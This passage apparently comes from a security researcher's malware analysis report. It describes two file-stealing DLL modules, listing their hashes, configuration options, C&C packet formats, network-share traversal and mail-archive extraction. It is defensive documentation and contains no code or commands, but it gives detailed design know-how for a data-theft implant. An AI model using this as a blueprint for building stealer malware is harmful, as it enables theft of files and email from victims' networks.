The data send to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
GetFileReg moduleKnown variants (all share the same code section, differ in resources):
MD5 Compilation date (payload)
163CEE95FA3EF1469030F0BFEC0EB64C 2011.07.18 07:03:52 (GMT)
CC0F35631D7F69EB087F31754FA9635A 2011.07.18 07:03:52 (GMT)
E8711B9DBB3E7A6FBC1DF70F7131520C 2011.07.18 07:03:52 (GMT)
469F4B81A01B1577531812385CAC827E 2011.07.18 07:03:52 (GMT)
E8711B9DBB3E7A6FBC1DF70F7131520C 2011.07.18 07:03:52 (GMT)
A8B8F616FFD94D34E4E188657A5C8BA7 2011.07.18 07:03:52 (GMT)
E461B07E2A11ED13DDC0F27162545DE1 2011.07.18 07:03:52 (GMT)
The file is a PE DLL file, 0 exports, compiled with Microsoft Visual Studio 2008. All functionality is implemented in the DllMainfunction.
DllMain functionWhen loaded, the module deletes the file named "dump", then proceeds to its main function. After executing the mainfunction, the module tries to delete the same file again.
Main functionFirst, the module initializes its main object and log headers, i.e.
@fileinforeg_log\GETFILEREG_STARTED_V1_%s.txt@fileinforeg_log\GETFILEREG_V1_%s.txt
Then, it retrieves its resource of type "AAA" and name "BBB". The resource is expected to be an INI file compressed usingZlib. The module decompresses the data and parses the whole INI file. It extracts data from the following INI sections:
INI section name Description
i_getfile Directory traversal and file matching rules
Common On/off switches for features, global settings
conn_a C&C server connection parameters
keylogger Identified but not used
Common options
Option name Description
i_getfile_all_dbx Extract data from all files with 'dbx' extension (Outlook Express mailarchives)
i_getfile_all_tbebat Extract data from all files with 'tbb' extension (The Bat mail archives)
i_getfile_all_thunderbird Extract data from all Thunderbird mail archives
i_getfile_all_disks Traverse all fixed and network disks
i_getfile_all_netdisks Traverse system network shares
i_getfile_all_netshared Traverse computer's network shares
f_time_min Minimum file creation or modification time to look for
f_time_max Maximum file creation or modification time to look for
f_total_send_size_max Global limit on the data to be sent to the C&C server
f_max_size Maximum file size to look for
f_min_size Minimum file size to look for
spec_check_task_existance_a Save last traversal time value and modify minimum file time optiondepending that value
i_getfile options
The following options apply only to the "i_getfile" section they are specified in
Option name Description f_max_size Maximum file size to look for f_min_size Minimum file size to look for f_time_minMinimum file creation or modification time to look for f_time_max Maximum file creation or modification time to look forf_regexp_a Regular expression to match against the filename (must match) f_regexp_d Regular expression to match againstthe filename (must not match, exclusion list) f_search_path Directories to traverse f_delete_file Delete the file after sendingits contents to the C&C serverConn_a options
Option name Description
D_CONN List of C&C server domain names, separated with ';'
D_NAME Relative URL
D_RPRT TCP port of the C&C server
D_SPRT Not used
D_USER Unique ID of the victim
D_MODE Not used
D_PASS Not used
J_CONN Not used
J_NAME Not used
J_RPRT Not used
J_SPRT Not used
J_USER Not used
J_MODE Not used
J_PASS Not used
VERSION_ID Sent to C&C
VER_SESSION_ID Not used
SEND_DELAY_TIME Not used
After parsing the INI file, the module tries to raise its privileges by logging on as a user with administrative rights. It looks forsuitable credentials in an encrypted file named "adt.dat" in the directories with CSIDLs:
CSIDL_LOCAL_APPDATA (%LOCALAPPDATA%, %USERPROFILE%\AppData\Local)CSIDL_COMMON_APPDATA (%ALLUSERSPROFILE%)
The module sends several types of packets to the C&C server.
The first packet is sent after the configuration is read, it contains the string "===" and starts with a string "Subject:Reflebt"Intermediate packets are sent when every traversal operation is finished, it also contains the contents of the internal logfile and starts with a string "Subject: Refleut"Contents of the stolen files are sent in separate packets, they are split in chunks of size 511950 bytes (regular files) or512000 (e-mails) bytes, starting with a string "Subject: Refleut"The final packet is sent after all operations are completed, it contains a string "===" and starts with a string "Subject:Refleet".
The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it isBase64-encoded.
Directory traversalDepending on the configuration file, the module may traverse different directories:
For each "i_get_file" configuration section, the module traverses the directories named in "f_search_path" values of the samesection.
If the "i_getfile_all_disks" global option is set, the module traverses all fixed and mounted network drives.
If the "i_getfile_all_netdisks" global option is set, the module searches for available network shares and tries to mount"\\%computer%\%drive%$" system shares for drive names from 'C' to 'F', then traverses these shares.
If the "i_getfile_all_netshared' global option is set, the module searches for all available network shares and traverses them.
The directories are traversed recursively, with a hardcoded depth limit of 100.
The global option "spec_check_task_existance_a" modifies the traversal and matching rules for local and network disks. Ifthis option is set, the module tracks the time of the last traversal of each disk in a file named "%DRIVE%\SystemRestore\System Restore Point". This file is then used to correct the minimum file creation/modification rules so that themodule skips the files that it should have already processed.
File matching rulesThe module applies the same matching routine to all files found while traversing the disks, folders and network shares.
For each file, the module checks if the file's creation and modification time satisfy both minimum and maximum configurationvalues, its size is within the allowed range and the filename is matched by at least one "f_regexp_a" regular expression andis not matched against any "f_regexp_d" regular expression. If the file's properties satisfy all the requirements, the file is sentto the C&C server.
Special processing is applied for the e-mail databases. The module can parse Outlook Express databases ("dbx" files), TheBat databases ("tbb" files) and Thunderbird message storages. Depending on the configuration options, these files may beread, processed and then extracted e-mail messages are sent to the C&C server.
After all operations are completed, the module sends the final C&C request with string "Subject: Refleet" and returns.
FileInfo moduleKnown variants (all share the same code section, differ in resources):
MD5 Compilation date (payload)
C9686F76F827D8B16C434C84FDF9BE06 09.10.2012 5:49
B6F2D2D27A91D99AB396AD7A4B4937DE 09.10.2012 5:49
AC83001F4228D92F1457E5841792EAC1 09.10.2012 5:49
SummaryThe file is a PE DLL file with 2 exported functions, compiled with Microsoft Visual Studio 2010. All functionality isimplemented in the "START" function. The module is very similar to the "GetFileReg" module. It is stored on disk as anencrypted file that is loaded by the "Scheduler" module.
Creates encrypted log files: "%TMP%\smrdprev\smrdprev_%p_%p.tmp", where "%p" parameters are formatted from thereturn values of subsequent GetTickCount API calls.
Creates encrypted storage files: "%TEMP%\%08 hex digits%hst", where 8 hex digits represent the CRC32 checksum of thecurrent user's name.
Creates mutex: "Win32Wbem32Prefetchfamt"
START functionWhen started, the module initializes its log object with a new filename using a format string"%TMP%\smrdprev\smrdprev_%p_%p.tmp", and sets the log header:
@LOG\FILEINFOAMT_1
Then, it creates four data collection and directory traversal objects and loads the configuration INI file. The configuration fileis loaded from the resource of type "BBB", name "AAA" and is decrypted using a custom AMPRNG cipher with a hardcodedkey.
The code of the module appears to be a new version or a fork of the "GetFileReg" module, so are the configuration optionsextracted from the INI file.
INI section name Description
i_getfile Directory traversal and file matching rules
Common On/off switches for features, global settings
conn_a C&C server connection parameters, not used
Keylogger Identified but not used
net_res_acl (new in 'fileinfo') Network share traversal and matching rules
Common options
Option name Description
i_process_all_net_res (newin 'fileinfo')
When turned on, only 'host_d' exclusion list is applied. When turned off,only network paths matching 'host_a' are processed.
i_getfile_all_dbx Extract data from all files with 'dbx' extension (Outlook Express mailarchives)
i_getfile_all_tbebat Extract data from all files with 'tbb' extension (The Bat mail archives)
i_getfile_all_thunderbird Extract data from all Thunderbird mail archives
i_getfile_all_disks Traverse all fixed and network disks
i_getfile_all_netdisks Traverse system network shares
i_getfile_all_netshared Traverse computer's network shares
f_time_min Minimum file creation or modification time to look for
f_time_max Maximum file creation or modification time to look for
f_total_send_size_max Global limit on the data to be sent to the C&C server
f_use_hash_storage (new in'fileinfo')
Store MD5 hashes of files and e-mails that were already processed, skipalready processed items
f_max_size Maximum file size to look for
f_min_size Minimum file size to look for
spec_check_task_existance_a Save last traversal time value and modify minimum file time optiondepending that value
log_level (new in 'fileinfo') Level of log verbosity: 'normal', 'quiet', 'extend'
process_ldisks_sleep (new in'fileinfo') Delay between each traversal, 'PROC_LDISKS'
process_ndisks_sleep (new in'fileinfo') Delay between each traversal, 'PROC_NDISKS'
process_nshare_sleep (newin 'fileinfo') Delay between each traversal, 'PROC_NSHARES'
process_spaths_sleep (newin 'fileinfo') Delay between each traversal, 'PROC_SPATHS'
i_getfile optionsThe following options apply only to the "i_getfile" section they are specified in
Option name Description
f_use_hash_storage (new in'fileinfo') The same as in the 'common' section
f_max_size Maximum file size to look for
f_min_size Minimum file size to look for
f_time_min Minimum file creation or modification time to look for
f_time_max Maximum file creation or modification time to look for
f_regexp_a Regular expression to match against the filename (must match)
f_regexp_d Regular expression to match against the filename (must not match,exclusion list)
f_search_path Directories to traverse
f_delete_file Delete the file after sending its contents to the C&C server
net_res_acl options (new in "fileinfo")
Option name Description
host_a Regular expression of network locations that should be traversed
host_d Regular expression of network locations that should not be traversed (exclusion list)
Then, the module starts four threads and assigns each traversal object to a thread. Every thread has a distinct scope ofsubjects to process:
1. Directories shared over the network, called "PROC_SHARES"2. Disks shared over the network, called "PROC_NDISKS"3. Search paths specified in "i_getfile" sections, called "PROC_SPATHS"4. Local disks, called "PROC_LDISKS"
The actual file matching and directory traversal code is almost identical to the one implemented in "GetFileReg". There areonly minor updates to the algorithm:
Remote directory and disk paths are matched against "host_a" or "host_d" regular expressions. The remote location istraversed only if "host_a" regular expression is matched, or if "i_process_all_net_res" is set and the location is notmatched by any of the "host_d" regular expressions.Remote disks are enumerated from "C$" to "Z$"If "f_use_hash_storage" option is turned on, the module creates a binary hash storage in a file named "%TEMP%\%08hex digits%hst", where 8 hex digits represent the CRC32 checksum of the current user's name. It populates that storagewith information about every processed file, including file size, creation date and MD5 hash of file's name. The modulechecks every new file this hash storage, and skips the file that were already processed.
Since traversal routines are now executed in separate threads, the "fileinfo" module introduces continuous mode ofoperation. Four options control this behavior, each corresponding to one thread:
process_ldisks_sleepprocess_ndisks_sleepprocess_nshare_sleepprocess_spaths_sleep
The directory traversal threads run their code in infinite loops, and "sleep" values specify the delay in milliseconds thatshould pass between iterations.
Data exfiltrationAlthough the module extracts the C&C server information from its configuration file, it does not interact with the C&C server inany way. All information including collected file names and contents is stored in its encrypted log files("%TMP%\smrdprev\smrdprev_%p_%p.tmp").
